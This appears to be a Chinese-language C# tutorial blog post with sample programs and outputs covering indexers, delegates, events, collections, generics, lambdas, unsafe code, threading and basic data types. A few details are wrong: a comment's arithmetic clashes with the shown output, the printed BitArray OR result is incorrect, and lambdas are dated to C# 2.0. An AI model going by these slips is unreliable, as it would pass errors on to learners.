    using System;
    namespace IndexerApplication
    {
    class IndexedNames
    {
    private string[] namelist = new string[size];
    static public int size = 10;
    public IndexedNames()
    {
    for (int i = 0; i < size; i++)
    {
    namelist[i] = "N. A.";
    }
    }
    public string this[int index]
    {
    get
    {
    string tmp;

    if (index >= 0 && index <= size - 1)
    {
    tmp = namelist[index];
    }
    else
    {
    tmp = "";
    }

    return (tmp);
    }
    set
    {
    if (index >= 0 && index <= size - 1)
    {
    namelist[index] = value;
    }
    }
    }
    public int this[string name]
    {
    get
    {
    int index = 0;
    while (index < size)
    {
    if (namelist[index] == name)
    {
    return index;
    }
    index++;
    }
    return index;
    }

    }

    static void Main(string[] args)
    {
    IndexedNames names = new IndexedNames();
    names[0] = "Zara";
    names[1] = "Riz";
    names[2] = "Nuha";
    names[3] = "Asif";
    names[4] = "Davinder";
    names[5] = "Sunil";
    names[6] = "Rubic";
    // 使用带有 int 参数的第一个索引器
    for (int i = 0; i < IndexedNames.size; i++)
    {
    Console.WriteLine(names[i]);
    }
    // 使用带有 string 参数的第二个索引器
    Console.WriteLine(names["Nuha"]);
    Console.ReadKey();
    }
    }
    }
    Zara
    Riz
    Nuha
    Asif
    Davinder
    Sunil
    Rubic
    N. A.
    N. A.
    N. A.
    2

    C# 委托(Delegate)

    ​C# 中的委托(Delegate)类似于 C 或 C++ 中函数的指针委托(Delegate) 是存有对某个方法的引用的一种引用类型变量。引用可在运行时被改变。

    ​委托(Delegate)特别用于实现事件和回调方法。所有的委托(Delegate)都派生自 System.Delegate 类。

    实例化委托(Delegate)

    using System;

    delegate int NumberChanger(int n);
    namespace DelegateAppl
    {
    class TestDelegate
    {
    static int num = 10;
    public static int AddNum(int p)
    {
    num += p;
    return num;
    }

    public static int MultNum(int q)
    {
    num *= q;
    return num;
    }
    public static int getNum()
    {
    return num;
    }

    static void Main(string[] args)
    {
    // 创建委托实例
    NumberChanger nc1 = new NumberChanger(AddNum);
    NumberChanger nc2 = new NumberChanger(MultNum);
    // 使用委托对象调用方法
    nc1(25); // 10 + 15 = 25
    Console.WriteLine("Value of Num: {0}", getNum());
    nc2(5); // 25 * 5 = 175
    Console.WriteLine("Value of Num: {0}", getNum());
    Console.ReadKey();
    }
    }
    }
    Value of Num: 35
    Value of Num: 175

    委托的多播(Multicasting of a Delegate)

    ​委托对象可使用 “+” 运算符进行合并。一个合并委托调用它所合并的两个委托。只有相同类型的委托可被合并。“-” 运算符可用于从合并的委托中移除组件委托。

    ​使用委托的这个有用的特点,您可以创建一个委托被调用时要调用的方法的调用列表。这被称为委托的 多播(multicasting),也叫组播。下面的程序演示了委托的多播:

    using System;

    delegate int NumberChanger(int n);
    namespace DelegateAppl
    {
    class TestDelegate
    {
    static int num = 10;
    public static int AddNum(int p)
    {
    num += p;
    return num;
    }

    public static int MultNum(int q)
    {
    num *= q;
    return num;
    }
    public static int getNum()
    {
    return num;
    }

    static void Main(string[] args)
    {
    // 创建委托实例
    NumberChanger nc;
    NumberChanger nc1 = new NumberChanger(AddNum);
    NumberChanger nc2 = new NumberChanger(MultNum);
    nc = nc1;
    nc += nc2;
    // 调用多播
    nc(5); // (10 + 5) * 5 = 75
    Console.WriteLine("Value of Num: {0}", getNum());
    Console.ReadKey();
    }
    }
    }
    Value of Num: 75

    委托(Delegate)的用途

    ​下面的实例演示了委托的用法。委托 printString 可用于引用带有一个字符串作为输入的方法,并不返回任何东西。

    ​我们使用这个委托来调用两个方法(将函数变成一个参数),第一个把字符串打印到控制台,第二个把字符串打印到文件:

    using System;
    using System.IO;

    namespace DelegateAppl
    {
    class PrintString
    {
    static FileStream fs;
    static StreamWriter sw;
    // 委托声明
    public delegate void printString(string s);

    // 该方法打印到控制台
    public static void WriteToScreen(string str)
    {
    Console.WriteLine("The String is: {0}", str);
    }
    // 该方法打印到文件
    public static void WriteToFile(string s)
    {
    fs = new FileStream("c:\\message.txt", FileMode.Append, FileAccess.Write);
    sw = new StreamWriter(fs);
    sw.WriteLine(s);
    sw.Flush();
    sw.Close();
    fs.Close();
    }
    // 该方法把委托作为参数,并使用它调用方法
    public static void sendString(printString ps)
    {
    ps("Hello World");
    }
    static void Main(string[] args)
    {
    printString ps1 = new printString(WriteToScreen);
    printString ps2 = new printString(WriteToFile);
    sendString(ps1);
    sendString(ps2);
    Console.ReadKey();
    }
    }
    }

    C# 事件(Event)

    事件(Event) 基本上说是一个用户操作,如按键、点击、鼠标移动等等,或者是一些提示信息,如系统生成的通知。应用程序需要在事件发生时响应事件。例如,中断。

    C# 中使用事件机制实现线程间的通信。

    通过事件使用委托

    ​事件在类中声明且生成,且通过使用同一个类或其他类中的委托与事件处理程序关联。包含事件的类用于发布事件。这被称为 发布器(publisher) 类。其他接受该事件的类被称为 订阅器(subscriber) 类。事件使用 发布-订阅(publisher-subscriber) 模型。

    发布器(publisher) 是一个包含事件和委托定义的对象。事件和委托之间的联系也定义在这个对象中。发布器(publisher)类的对象调用这个事件,并通知其他的对象。

    订阅器(subscriber) 是一个接受事件并提供事件处理程序的对象。在发布器(publisher)类中的委托调用订阅器(subscriber)类中的方法(事件处理程序)。

    声明事件(Event)

    ​在类的内部声明事件,首先必须声明该事件的委托类型。例如:

    public delegate void BoilerLogHandler(string status);

    ​然后,声明事件本身,使用 event 关键字:

    // 基于上面的委托定义事件
    public event BoilerLogHandler BoilerEventLog;

    示例

    using System;
    namespace SimpleEvent
    {
    using System;
    /***********发布器类***********/
    public class EventTest
    {
    private int value;

    public delegate void NumManipulationHandler();

    public event NumManipulationHandler ChangeNum;

    protected virtual void OnNumChanged() // 为了允许子类(如果有的话)重写这个方法
    {
    if (ChangeNum != null)
    {
    ChangeNum(); /* 事件被触发,派发事件 ChangeNum */
    }
    else
    {
    Console.WriteLine("event not fire");
    Console.ReadKey(); /* 回车继续 */
    }
    }


    public EventTest() // 构造函数
    {
    int n = 5;
    SetValue(n);
    }


    public void SetValue(int n)
    {
    if (value != n) // 如果数据更新:
    {
    value = n;
    OnNumChanged();
    }
    }
    }


    /***********订阅器类***********/

    public class subscribEvent
    {
    public void printf()
    {
    Console.WriteLine("event fire");
    Console.ReadKey(); /* 回车继续 */
    }
    }

    /***********触发***********/
    public class MainClass
    {
    public static void Main()
    {
    EventTest e = new EventTest(); /* 实例化对象,构造函数将执行一次 OnNumChanged(),第一次没有触发事件 */
    subscribEvent v = new subscribEvent(); /* 实例化对象 */
    e.ChangeNum += new EventTest.NumManipulationHandler(v.printf); /* 注册:接收到消息时,执行函数:printf() */
    e.SetValue(7);
    e.SetValue(11);
    e.SetValue(11);
    e.SetValue(9);
    }
    }
    }
    event not fire
    event fire
    event fire
    event fire

    C# 集合(Collection)

    ​集合(Collection)类是专门用于数据存储和检索的类。这些类提供了对:

    • 栈(stack)
    • 队列(queue)
    • 列表(list)
    • 哈希表(hash table)

    的支持。大多数集合类实现了相同的接口。

    List

    using System;
    using static System.Console;
    using System.Collections.Generic;
    namespace HelloWorldApplication
    {
    class HelloWorld
    {
    static void Main(string[] args)
    {
    var a = new List<int>();
    a.Add(2);
    a.Add(6);
    a.Add(2);
    a.Add(10);
    Console.WriteLine($"第一个数为{a[0]}");
    a.Remove(2);//删去第一个匹配此条件的项
    a.Sort();
    foreach (var a2 in a)
    {
    WriteLine(a2);
    }
    bool a3 = a.Contains(2);
    WriteLine(a3);
    Console.ReadKey();
    }
    }
    }
    第一个数为2
    2
    6
    10
    True

    动态数组(ArrayList)

    ​在 C# 中,List<T>ArrayList 都是用来存储集合数据的类,但它们在实现和使用上有一些重要的区别:

    1. 类型安全性
      • ListList<T> 是泛型类,其中的 <T> 表示可以存储的元素类型。这意味着在创建 List<T> 实例时,你必须指定存储在列表中的元素类型。例如,List<int> 表示只能存储整数类型的列表,List<string> 表示只能存储字符串类型的列表。由于是泛型类,编译器可以在编译时执行类型检查,确保在编写代码时就能捕获到类型不匹配的错误。
      • ArrayListArrayList 是非泛型类,可以存储任意类型的对象。在 ArrayList 中,存储的是 object 类型的元素,因此可以存储任何类型的对象。但这也带来了一个问题,即当你从 ArrayList 中取出元素时,需要进行显式的类型转换,这可能导致运行时类型转换错误。
    2. 性能
      • List 通常比 ArrayList 性能更好,因为它避免了装箱和拆箱的开销。装箱是将值类型转换为对象类型,而拆箱是将对象类型转换为值类型。由于 List<T> 是泛型的,可以直接存储值类型,因此避免了这些额外的操作。
      • ArrayList 存储的是 object 类型,因此当你从 ArrayList 中取出元素时,需要进行类型转换(拆箱),这会引入性能损失。
    3. 扩展性
      • List 支持 LINQ 查询,因为它是泛型的,可以与 LINQ 方法无缝集成,提供了丰富的集合操作功能。
      • ArrayList 由于存储的是 object 类型,无法直接与 LINQ 方法一起使用,需要在使用时进行显式的类型转换。

    ​基于以上区别,推荐在大多数情况下优先选择 List<T>,因为它提供了类型安全、性能更好以及更好的扩展性。只有在需要与遗留代码或者需要存储不同类型对象的情况下,才考虑使用 ArrayList

    using System;
    using System.Collections;

    namespace CollectionApplication
    {
    class Program
    {
    static void Main(string[] args)
    {
    ArrayList al = new ArrayList();

    Console.WriteLine("Adding some objects:");
    al.Add(45);
    al.Add("A");
    al.Add(33);
    al.Add(56);
    al.Add(true);
    al.Add(23);
    al.Add(9);

    Console.WriteLine("Capacity: {0} ", al.Capacity);
    Console.WriteLine("Count: {0}", al.Count);

    Console.Write("Content: ");
    foreach (var i in al)
    {
    Console.Write(i + " ");
    }
    Console.WriteLine();
    Console.ReadKey();
    }
    }
    }
    Adding some objects:
    Capacity: 8
    Count: 7
    Content: 45 A 33 56 True 23 9

    哈希表(Hashtable)

    ​Hashtable 类代表了一系列基于键的哈希代码组织起来的键/值对。它使用来访问集合中的元素。

    ​当您使用访问元素时,则使用哈希表,而且您可以识别一个有用的键值。哈希表中的每一项都有一个键/值对。键用于访问集合中的项目。

    using System;
    using System.Collections;

    namespace CollectionsApplication
    {
    class Program
    {
    static void Main(string[] args)
    {
    Hashtable ht = new Hashtable();


    ht.Add("001", "Zara Ali");
    ht.Add("002", "Abida Rehman");
    ht.Add("003", "Joe Holzner");
    ht.Add("004", "Mausam Benazir Nur");
    ht.Add("005", "M. Amlan");
    ht.Add("006", "M. Arif");
    ht.Add("007", "Ritesh Saikia");

    if (ht.ContainsValue("Nuha Ali"))
    {
    Console.WriteLine("This student name is already in the list");
    }
    else
    {
    ht.Add("008", "Nuha Ali");
    }
    // 获取键的集合
    ICollection key = ht.Keys;

    foreach (string k in key)
    {
    Console.WriteLine(k + ": " + ht[k]);
    }
    Console.ReadKey();
    }
    }
    }
    006: M. Arif
    007: Ritesh Saikia
    008: Nuha Ali
    003: Joe Holzner
    002: Abida Rehman
    004: Mausam Benazir Nur
    001: Zara Ali
    005: M. Amlan

    字典

    ​在 C# 中,哈希表(HashTable)和字典(Dictionary)是两种不同的数据结构,它们具有以下区别:

    1. 实现方式
      • 哈希表(HashTable)System.Collections.Hashtable 是在早期版本的.NET中提供的,它实现了一个散列表,使用哈希函数来存储和访问键值对。它支持通过哈希码进行快速的插入、删除和查找操作。哈希表中的键和值可以是任意对象,但通常情况下要求键和值都不为null。
      • 字典(Dictionary)System.Collections.Generic.Dictionary<TKey, TValue> 是泛型类型,在.NET Framework 2.0及以后的版本中引入。字典也是基于哈希表的实现,但它是类型安全的,允许指定键(Key)和值(Value)的类型。这使得字典在类型检查和类型安全性方面比哈希表更优越。
    2. 类型安全性
      • 哈希表:由于哈希表存储的是object类型,所以在检索值时需要进行显式的类型转换,这可能导致运行时类型错误或异常。
      • 字典:字典使用泛型参数 <TKey, TValue> 定义键和值的类型,因此编译器能够在编译时捕获类型错误,提供更安全的操作。
    3. 性能
      • 在大多数情况下,字典的性能会优于哈希表,因为字典的实现允许更高效的内部优化,而且由于泛型类型的引入,它可以更准确地利用内存和处理器的优化特性。

    ​综上所述,尽管哈希表和字典在功能上有所重叠(即存储键值对的能力),但字典在C#中通常是更好的选择,特别是在需要类型安全、更好性能和更清晰的编码方面。

    using System;
    using System.Collections.Generic;
    namespace HelloWorldApplication
    {
    class A
    {
    static void Main(string[] args)
    {
    var a = new Dictionary<int, int>();
    a.Add(12, 14);
    a.Add(0, 1);
    Console.WriteLine("删去前的Count" + a.Count);
    a.Remove(0);
    Console.WriteLine(a[12]);
    Console.WriteLine(a.Count);
    Console.WriteLine(a.ContainsKey(12));
    Console.ReadKey();
    }
    }
    }
    删去前的Count2
    14
    1
    True

    排序列表(SortedList)

    ​SortedList 类代表了一系列按照键来排序的键/值对,这些键值对可以通过键和索引来访问。

    ​排序列表是数组和哈希表的组合。它包含一个可使用键或索引访问各项的列表。如果您使用索引访问各项,则它是一个动态数组(ArrayList),如果您使用键访问各项,则它是一个哈希表(Hashtable)。集合中的各项总是按键值排序。

    using System;
    using System.Collections;

    namespace CollectionsApplication
    {
    class Program
    {
    static void Main(string[] args)
    {
    SortedList sl = new SortedList();

    sl.Add("003", "Joe Holzner");
    sl.Add("001", "Zara Ali");
    sl.Add("004", "Mausam Benazir Nur");
    sl.Add("002", "Abida Rehman");
    sl.Add("107", "Ritesh Saikia");
    sl.Add("006", "M. Arif");
    sl.Add("00A", "M. Amlan");

    if (sl.ContainsValue("Nuha Ali"))
    {
    Console.WriteLine("This student name is already in the list");
    }
    else
    {
    sl.Add("008", "Nuha Ali");
    }

    // 获取键的集合
    ICollection key = sl.Keys;

    foreach (string k in key)
    {
    Console.WriteLine(k + ": " + sl[k]);
    }
    }
    }
    }
    001: Zara Ali
    002: Abida Rehman
    003: Joe Holzner
    004: Mausam Benazir Nur
    006: M. Arif
    008: Nuha Ali
    00A: M. Amlan
    107: Ritesh Saikia

    堆栈(Stack)

    堆栈(Stack)代表了一个后进先出的对象集合。当您需要对各项进行后进先出的访问时,则使用堆栈。当您在列表中添加一项,称为推入元素,当您从列表中移除一项时,称为弹出元素。

    using System;
    using System.Collections;

    namespace CollectionsApplication
    {
    class Program
    {
    static void Main(string[] args)
    {
    Stack st = new Stack();

    st.Push('A');
    st.Push('M');
    st.Push('G');
    st.Push('W');

    Console.WriteLine("Current stack: ");
    foreach (char c in st)
    {
    Console.Write(c + " ");
    }
    Console.WriteLine();

    st.Push('V');
    st.Push('H');
    Console.WriteLine("The next poppable value in stack: {0}",
    st.Peek());
    Console.WriteLine("Current stack: ");
    foreach (char c in st)
    {
    Console.Write(c + " ");
    }
    Console.WriteLine();

    Console.WriteLine("Removing values ");
    st.Pop();
    st.Pop();
    st.Pop();

    Console.WriteLine("Current stack: ");
    foreach (char c in st)
    {
    Console.Write(c + " ");
    }
    }
    }
    }
    Current stack:
    W G M A
    The next poppable value in stack: H
    Current stack:
    H V W G M A
    Removing values
    Current stack:
    G M A

    队列(Queue)

    ​**队列(Queue)代表了一个先进先出的对象集合。**当您需要对各项进行先进先出的访问时,则使用队列。当您在列表中添加一项,称为入队,当您从列表中移除一项时,称为出队。

    using System;
    using System.Collections;

    namespace CollectionsApplication
    {
    class Program
    {
    static void Main(string[] args)
    {
    Queue q = new Queue();

    q.Enqueue('A');
    q.Enqueue('M');
    q.Enqueue('G');
    q.Enqueue('W');

    Console.WriteLine("Current queue: ");
    foreach (char c in q)
    Console.Write(c + " ");
    Console.WriteLine();
    q.Enqueue('V');
    q.Enqueue('H');
    Console.WriteLine("Current queue: ");
    foreach (char c in q)
    Console.Write(c + " ");
    Console.WriteLine();
    Console.WriteLine("Removing some values ");
    char ch = (char)q.Dequeue();
    Console.WriteLine("The removed value: {0}", ch);
    ch = (char)q.Dequeue();
    Console.WriteLine("The removed value: {0}", ch);
    Console.ReadKey();
    }
    }
    }
    Current queue:
    A M G W
    Current queue:
    A M G W V H
    Removing some values
    The removed value: A
    The removed value: M

    点阵列(BitArray)

    ​BitArray 类管理一个紧凑型的位值数组,它使用布尔值来表示,其中 true 表示位是开启的(1),false 表示位是关闭的(0)。

    ​当您需要存储位,但是事先不知道位数时,则使用点阵列。您可以使用整型索引从点阵列集合中访问各项,索引从零开始。

    using System;
    using System.Collections;

    namespace CollectionsApplication
    {
    class Program
    {
    static void Main(string[] args)
    {
    // 创建两个大小为 8 的点阵列
    BitArray ba1 = new BitArray(8);
    BitArray ba2 = new BitArray(8);
    byte[] a = { 60 };
    byte[] b = { 13 };

    // 把值 60 和 13 存储到点阵列中
    ba1 = new BitArray(a);
    ba2 = new BitArray(b);

    // ba1 的内容
    Console.WriteLine("Bit array ba1: 60");
    for (int i = 0; i < ba1.Count; i++)
    {
    Console.Write("{0, -6} ", ba1[i]);
    }
    Console.WriteLine();

    // ba2 的内容
    Console.WriteLine("Bit array ba2: 13");
    for (int i = 0; i < ba2.Count; i++)
    {
    Console.Write("{0, -6} ", ba2[i]);
    }
    Console.WriteLine();


    BitArray ba3 = new BitArray(8);
    ba3 = ba1.And(ba2);

    // ba3 的内容
    Console.WriteLine("Bit array ba3 after AND operation: 12");
    for (int i = 0; i < ba3.Count; i++)
    {
    Console.Write("{0, -6} ", ba3[i]);
    }
    Console.WriteLine();

    ba3 = ba1.Or(ba2);
    // ba3 的内容
    Console.WriteLine("Bit array ba3 after OR operation: 61");
    for (int i = 0; i < ba3.Count; i++)
    {
    Console.Write("{0, -6} ", ba3[i]);
    }
    Console.WriteLine();

    Console.ReadKey();
    }
    }
    }
    Bit array ba1: 60
    False False True True True True False False
    Bit array ba2: 13
    True False True True False False False False
    Bit array ba3 after AND operation: 12
    False False True True False False False False
    Bit array ba3 after OR operation: 61
    True False True True False False False False

    ​感觉就是把一个数的二进制形式拆成 bool 形式来表示。

    泛型(Generic)

    泛型(Generic) 允许您延迟编写类或方法中的编程元素的数据类型的规范,直到实际在程序中使用它的时候。换句话说,泛型允许您编写一个可以与任何数据类型一起工作的类或方法。

    ​您可以通过数据类型的替代参数编写类或方法的规范。当编译器遇到类的构造函数或方法的函数调用时,它会生成代码来处理指定的数据类型。

    ​您可以通过类型参数定义泛型委托。例如:

    using System;
    using System.Collections.Generic;

    delegate T NumberChanger<T>(T n);
    namespace GenericDelegateAppl
    {
    class TestDelegate
    {
    static int num = 10;
    public static int AddNum(int p)
    {
    num += p;
    return num;
    }

    public static int MultNum(int q)
    {
    num *= q;
    return num;
    }
    public static int getNum()
    {
    return num;
    }

    static void Main(string[] args)
    {
    // 创建委托实例
    NumberChanger<int> nc1 = new NumberChanger<int>(AddNum);
    NumberChanger<int> nc2 = new NumberChanger<int>(MultNum);
    // 使用委托对象调用方法
    nc1(25);
    Console.WriteLine("Value of Num: {0}", getNum());
    nc2(5);
    Console.WriteLine("Value of Num: {0}", getNum());
    Console.ReadKey();
    }
    }
    }
    Value of Num: 35
    Value of Num: 175

    C# 匿名方法

    ​在 C# 中,匿名函数是一种没有名字的方法,可以在代码中定义和使用。

    ​我们已经提到过,委托是用于引用与其具有相同标签的方法。换句话说,您可以使用委托对象调用可由委托引用的方法。

    匿名方法(Anonymous methods) 提供了一种传递代码块作为委托参数的技术。

    ​在匿名方法中您不需要指定返回类型,它是从方法主体内的 return 语句推断的。

    Lambda 表达式

    ​Lambda 表达式是一个简洁的语法,用于创建匿名函数。它们通常用于 LINQ 查询和委托。

    (parameters) => expression
    // 或
    (parameters) => { statement; }
    // 示例:使用 Lambda 表达式定义一个委托
    Func<int, int, int> add = (a, b) => a + b;
    Console.WriteLine(add(2, 3)); // 输出 5

    // 示例:使用 Lambda 表达式过滤数组中的元素
    int[] numbers = { 1, 2, 3, 4, 5 };
    var evenNumbers = numbers.Where(n => n % 2 == 0);
    foreach (var num in evenNumbers)
    {
    Console.WriteLine(num); // 输出 2 4
    }

    匿名方法

    ​匿名方法是通过使用 delegate 关键字创建委托实例来声明的。

    using System;

    delegate void NumberChanger(int n);
    namespace DelegateAppl
    {
    class TestDelegate
    {
    static int num = 10;
    public static void AddNum(int p)
    {
    num += p;
    Console.WriteLine("Named Method: {0}", num);
    }

    public static void MultNum(int q)
    {
    num *= q;
    Console.WriteLine("Named Method: {0}", num);
    }

    static void Main(string[] args)
    {
    // 使用匿名方法创建委托实例
    NumberChanger nc = delegate(int x)
    {
    Console.WriteLine("Anonymous Method: {0}", x);
    };

    // 使用匿名方法调用委托
    nc(10);

    // 使用命名方法实例化委托
    nc = new NumberChanger(AddNum);

    // 使用命名方法调用委托
    nc(5);

    // 使用另一个命名方法实例化委托
    nc = new NumberChanger(MultNum);

    // 使用命名方法调用委托
    nc(2);
    Console.ReadKey();
    }
    }
    }

    ​在 C# 2.0 及更高版本中,引入了 lambda 表达式,它是一种更简洁的语法形式,用于编写匿名方法。

    ​使用 lambda 表达式:

    using System;

    delegate void NumberChanger(int n);

    namespace DelegateAppl
    {
    class TestDelegate
    {
    static int num = 10;

    public static void AddNum(int p)
    {
    num += p;
    Console.WriteLine("Named Method: {0}", num);
    }

    public static void MultNum(int q)
    {
    num *= q;
    Console.WriteLine("Named Method: {0}", num);
    }

    static void Main(string[] args)
    {
    // 使用 lambda 表达式创建委托实例
    NumberChanger nc = x => Console.WriteLine($"Lambda Expression: {x}");

    // 使用 lambda 表达式调用委托
    nc(10);

    // 使用命名方法实例化委托
    nc = new NumberChanger(AddNum);

    // 使用命名方法调用委托
    nc(5);

    // 使用另一个命名方法实例化委托
    nc = new NumberChanger(MultNum);

    // 使用命名方法调用委托
    nc(2);

    Console.ReadKey();
    }
    }
    }
    Lambda Expression: 10
    Named Method: 15
    Named Method: 30

    C# 不安全代码

    ​当一个代码块使用 unsafe 修饰符标记时,C# 允许在函数中使用指针变量。不安全代码或非托管代码是指使用了指针变量的代码块。

    ​就跟 C/C++ 差不多了……

    using System;
    namespace UnsafeCodeApplication
    {
    class Program
    {
    static unsafe void Main(string[] args)
    {
    int var = 20;
    int* p = &var;
    Console.WriteLine("Data is: {0} ", var);
    Console.WriteLine("Address is: {0}", (int)p);
    Console.ReadKey();
    }
    }
    }

    C# 多线程

    线程 被定义为程序的执行路径。每个线程都定义了一个独特的控制流。如果您的应用程序涉及到复杂的和耗时的操作,那么设置不同的线程执行路径往往是有益的,每个线程执行特定的工作。

    ​线程是轻量级进程。一个使用线程的常见实例是现代操作系统中并行编程的实现。使用线程节省了 CPU 周期的浪费,同时提高了应用程序的效率。

    ​到目前为止我们编写的程序是一个单线程作为应用程序的运行实例的单一的过程运行的。但是,这样子应用程序同时只能执行一个任务。为了同时执行多个任务,它可以被划分为更小的线程。

    using System;
    using System.Threading;

    namespace MultithreadingApplication
    {
    class ThreadCreationProgram
    {
    public static void CallToChildThread()
    {
    try
    {

    Console.WriteLine("Child thread starts");
    // 计数到 10
    for (int counter = 0; counter <= 10; counter++)
    {
    Thread.Sleep(500);
    Console.WriteLine(counter);
    }
    Console.WriteLine("Child Thread Completed");

    }
    catch (ThreadAbortException e)
    {
    Console.WriteLine("Thread Abort Exception");
    }
    finally
    {
    Console.WriteLine("Couldn't catch the Thread Exception");
    }

    }

    static void Main(string[] args)
    {
    ThreadStart childref = new ThreadStart(CallToChildThread);
    Console.WriteLine("In Main: Creating the Child thread");
    Thread childThread = new Thread(childref);
    childThread.Start();
    // 停止主线程一段时间
    Thread.Sleep(2000);
    // 现在中止子线程
    Console.WriteLine("In Main: Aborting the Child thread");
    childThread.Abort(); // 终止子线程
    Console.ReadKey();
    }
    }
    }
    In Main: Creating the Child thread
    Child thread starts
    0
    1
    2
    In Main: Aborting the Child thread
    Thread Abort Exception
    Couldn't catch the Thread Exception
    ]]>
    + 正文

    基础语法

    Hello world

    webp

    ​VS 里创建一个 控制台应用(.NET Framework)

    webp

    ​开始 Hello World!

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    using System;
    namespace HelloWorldApplication
    {
    /* 类名为 HelloWorld */
    class HelloWorld
    {
    /* main 函数 */
    static void Main(string[] args)
    {
    /* 我的第一个 C# 程序 */
    Console.WriteLine("Hello World!");
    Console.ReadKey();
    }
    }
    }

    C# 环境

    C# 是 .Net 框架的一部分,且用于编写 .Net 应用程序。

    Unity 使用开源 .NET 平台,以确保使用 Unity 创建的应用程序可以在各种不同的硬件配置上运行。

    .Net 框架是一个创新的平台,能帮您编写出下面类型的应用程序:

    • Windows 应用程序
    • Web 应用程序
    • Web 服务

    C# 程序结构

    一个 C# 程序主要包括以下部分:

    • 命名空间声明(Namespace declaration)
    • 一个 class
    • Class 方法
    • Class 属性
    • 一个 Main 方法
    • 语句(Statements)& 表达式(Expressions)
    • 注释
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    using System;  // using 关键字用于在程序中包含 System 命名空间。
    namespace HelloWorldApplication // 一个 namespace 里包含了一系列的类。便于管理,还可以防止类重名,在这里也可以不写。
    {
    class HelloWorld // C# 是完全面向对象的语言,执行代码必须放在一个类中
    {
    static void Main(string[] args) // Main 方法,是所有 C# 程序的入口点。Main 方法说明当执行时类将做什么动作。
    {
    /* 我的第一个 C# 程序*/
    Console.WriteLine("Hello World");
    Console.ReadKey(); // 针对 VS.NET 用户的。这使得程序会等待一个按键的动作,防止程序从 Visual Studio .NET 启动时屏幕会快速运行并关闭。在 VS2022 中,也可以 Ctrl + F5 启动调试防止控制台自动关闭。
    }
    }
    }

    C# 基本语法

    ​C# 是一种面向对象的编程语言。在面向对象的程序设计方法中,程序由各种相互交互的对象组成。相同种类的对象通常具有相同的类型,或者说,是在相同的 class 中。

    ​例如,以 Rectangle(矩形)对象为例。它具有 lengthwidth 属性。根据设计,它可能需要接受这些属性值、计算面积和显示细节。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    using System;
    namespace RectangleApplication
    {
    class Rectangle
    {
    // 成员变量
    double length;
    double width;
    public void Acceptdetails()
    {
    length = 4.5;
    width = 3.5;
    }
    public double GetArea()
    {
    return length * width;
    }
    public void Display()
    {
    Console.WriteLine("Length: {0}", length);
    Console.WriteLine("Width: {0}", width);
    Console.WriteLine("Area: {0}", GetArea());
    }
    }

    class ExecuteRectangle
    {
    static void Main(string[] args)
    {
    Rectangle r = new Rectangle();
    r.Acceptdetails();
    r.Display();
    Console.ReadLine();
    }
    }
    }
    1
    2
    3
    Length: 4.5
    Width: 3.5
    Area: 15.75

    C# 数据类型

    在 C# 中,变量分为以下几种类型:

    • 值类型(Value types)
    • 引用类型(Reference types)
    • 指针类型(Pointer types)

    值类型(Value types)

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    using System;

    namespace ConsoleApplication1
    {
    class Program
    {
    static void Main(string[] args)
    {
    PrintValueTypeRange();
    }
    static void PrintValueTypeRange()
    {
    Console.WriteLine("int 类型的最大值是:{0}", int.MaxValue); // 32 位有符号整数类型
    Console.WriteLine("uint 类型的最大值是:{0}", uint.MaxValue); // 32 位无符号整数类型
    Console.WriteLine("byte 类型的最大值是:{0}", byte.MaxValue); // 8 位无符号整数
    Console.WriteLine("sbyte 类型的最大值是:{0}", sbyte.MaxValue); // 8 位有符号整数类型
    Console.WriteLine("short 类型的最大值是:{0}", short.MaxValue); // 16 位有符号整数类型
    Console.WriteLine("ushort 类型的最大值是:{0}", ushort.MaxValue); // 16 位无符号整数类型
    Console.WriteLine("long 类型的最大值是:{0}", long.MaxValue); // 64 位有符号整数类型
    Console.WriteLine("ulong 类型的最大值是:{0}", ulong.MaxValue); // 64 位无符号整数类型
    Console.WriteLine("float 类型的最大值是:{0}", float.MaxValue); // 32 位单精度浮点型
    Console.WriteLine("double 类型的最大值是:{0}", double.MaxValue); // 64 位双精度浮点型
    Console.WriteLine("decimal 类型的最大值是:{0}", decimal.MaxValue); // 128 位精确的十进制值,28-29 有效位数
    Console.WriteLine("int 类型的最小值是:{0}", int.MinValue);
    Console.WriteLine("uint 类型的最小值是:{0}", uint.MinValue);
    Console.WriteLine("byte 类型的最小值是:{0}", byte.MinValue);
    Console.WriteLine("sbyte 类型的最小值是:{0}", sbyte.MinValue);
    Console.WriteLine("short 类型的最小值是:{0}", short.MinValue);
    Console.WriteLine("ushort 类型的最小值是:{0}", ushort.MinValue);
    Console.WriteLine("long 类型的最小值是:{0}", long.MinValue);
    Console.WriteLine("ulong 类型的最小值是:{0}", ulong.MinValue);
    Console.WriteLine("float 类型的最小值是:{0}", float.MinValue);
    Console.WriteLine("double 类型的最小值是:{0}", double.MinValue);
    Console.WriteLine("decimal 类型的最小值是:{0}", decimal.MinValue);
    Console.ReadKey();
    }
    }
    }
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    int      类型的最大值是:2147483647
    uint 类型的最大值是:4294967295
    byte 类型的最大值是:255
    sbyte 类型的最大值是:127
    short 类型的最大值是:32767
    ushort 类型的最大值是:65535
    long 类型的最大值是:9223372036854775807
    ulong 类型的最大值是:18446744073709551615
    float 类型的最大值是:3.402823E+38
    double 类型的最大值是:1.79769313486232E+308
    decimal 类型的最大值是:79228162514264337593543950335
    int 类型的最小值是:-2147483648
    uint 类型的最小值是:0
    byte 类型的最小值是:0
    sbyte 类型的最小值是:-128
    short 类型的最小值是:-32768
    ushort 类型的最小值是:0
    long 类型的最小值是:-9223372036854775808
    ulong 类型的最小值是:0
    float 类型的最小值是:-3.402823E+38
    double 类型的最小值是:-1.79769313486232E+308
    decimal 类型的最小值是:-79228162514264337593543950335

